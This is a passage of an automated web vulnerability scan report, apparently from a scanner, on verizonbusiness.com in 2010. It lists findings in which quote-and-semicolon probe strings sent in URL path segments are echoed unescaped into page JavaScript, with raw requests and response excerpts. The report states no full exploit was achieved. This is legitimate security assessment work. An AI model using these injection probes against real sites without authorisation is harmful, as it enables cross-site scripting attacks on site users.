Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:44 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47573
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/clc78b8';45cebbc83db/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.484. http://www.verizonbusiness.com/cl/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /cl/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9575f"%3ba9f6ed2feb8 was submitted in the REST URL parameter 1. This input was echoed as 9575f";a9f6ed2feb8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cl9575f"%3ba9f6ed2feb8/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:28 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47573
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Esta p..gina no existe";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/cl9575f";a9f6ed2feb8/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.485. http://www.verizonbusiness.com/cn/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /cn/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d51a5"%3b144e85efc1d was submitted in the REST URL parameter 1. This input was echoed as d51a5";144e85efc1d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cnd51a5"%3b144e85efc1d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:55:53 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/cnd51a5";144e85efc1d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.486. http://www.verizonbusiness.com/cn/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /cn/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64d1d'%3baeb8833cd86 was submitted in the REST URL parameter 1. This input was echoed as 64d1d';aeb8833cd86 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cn64d1d'%3baeb8833cd86/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/cn64d1d';aeb8833cd86/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.487. http://www.verizonbusiness.com/co/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /co/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96f82"%3b81f7036d4a3 was submitted in the REST URL parameter 1. This input was echoed as 96f82";81f7036d4a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /co96f82"%3b81f7036d4a3/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:56:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40604
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/co96f82";81f7036d4a3/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.488. http://www.verizonbusiness.com/co/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /co/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f88b6'%3b5ace4eb3b43 was submitted in the REST URL parameter 1. This input was echoed as f88b6';5ace4eb3b43 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cof88b6'%3b5ace4eb3b43/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40604
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/cof88b6';5ace4eb3b43/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.489. http://www.verizonbusiness.com/countries/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /countries/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5274a"%3b3bfa047d72c was submitted in the REST URL parameter 1. This input was echoed as 5274a";3bfa047d72c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /countries5274a"%3b3bfa047d72c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:05 GMT
Content-Type: text/html
Content-Length: 40620
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/countries5274a";3bfa047d72c/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.490. http://www.verizonbusiness.com/countries/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /countries/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a94f'%3b53e0984e779 was submitted in the REST URL parameter 1. This input was echoed as 7a94f';53e0984e779 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /countries7a94f'%3b53e0984e779/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40618
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/countries7a94f';53e0984e779/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.491. http://www.verizonbusiness.com/de/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32d2f'%3b1b4f203899 was submitted in the REST URL parameter 1. This input was echoed as 32d2f';1b4f203899 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de32d2f'%3b1b4f203899/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:56:59 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 46786
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/de32d2f';1b4f203899/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.492. http://www.verizonbusiness.com/de/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58f8d"%3b9f24227e815 was submitted in the REST URL parameter 1. This input was echoed as 58f8d";9f24227e815 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de58f8d"%3b9f24227e815/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:43 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 46788
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Seite nicht gefunden";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/de58f8d";9f24227e815/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.493. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33d3f'%3b8a0c05a86bc was submitted in the REST URL parameter 1. This input was echoed as 33d3f';8a0c05a86bc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de33d3f'%3b8a0c05a86bc/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:19 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 46818
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/de33d3f';8a0c05a86bc/solutions/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.494. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6115"%3bd00011f8cb9 was submitted in the REST URL parameter 1. This input was echoed as e6115";d00011f8cb9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dee6115"%3bd00011f8cb9/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:07 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 46816
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Seite nicht gefunden";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/dee6115";d00011f8cb9/solutions/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.495. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb63a'%3ba490251b8b4 was submitted in the REST URL parameter 2. This input was echoed as fb63a';a490251b8b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de/solutionsfb63a'%3ba490251b8b4/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:44 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47600
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/de/solutionsfb63a';a490251b8b4/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.496. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76d60"%3b65d5b6ed1ff was submitted in the REST URL parameter 2. This input was echoed as 76d60";65d5b6ed1ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de/solutions76d60"%3b65d5b6ed1ff/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
